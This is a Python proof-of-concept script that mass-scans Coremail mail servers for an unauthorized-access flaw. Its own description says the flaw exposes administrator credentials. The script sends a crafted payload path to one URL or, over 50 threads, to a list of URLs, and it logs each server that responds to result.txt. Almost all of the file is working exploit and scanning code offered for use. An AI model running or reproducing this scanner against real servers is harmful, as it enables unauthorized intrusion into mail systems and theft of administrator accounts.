import requests,argparse,sys
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner = """ ██████╗ ██████╗ ██████╗ ███████╗███╗   ███╗ █████╗ ██╗██╗     
██╔════╝██╔═══██╗██╔══██╗██╔════╝████╗ ████║██╔══██╗██║██║     
██║     ██║   ██║██████╔╝█████╗  ██╔████╔██║███████║██║██║     
██║     ██║   ██║██╔══██╗██╔══╝  ██║╚██╔╝██║██╔══██║██║██║     
╚██████╗╚██████╔╝██║  ██║███████╗██║ ╚═╝ ██║██║  ██║██║███████╗
 ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝╚══════╝
                                                               

"""
    print(banner)

def main():
    banner()
    parser = argparse.ArgumentParser(description="Coremail 邮件系统未授权访问获取管理员账密POC")
    parser.add_argument('-u','-url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','-file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/coremail/common/assets/;l;/;/;/;/;/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2"
    try:
        res1 = requests.get(url=target+payload,verify=False,timeout=10)
        if res1.status_code == 200:
            print(f"[+]{target}存在未授权访问漏洞")
            with open('result.txt','a')as f:
                f.write(target+'\n')
        else:
            print(f"[-]{target}不存在未授权访问漏洞")
    except:
        pass

if __name__ == "__main__":
    main()
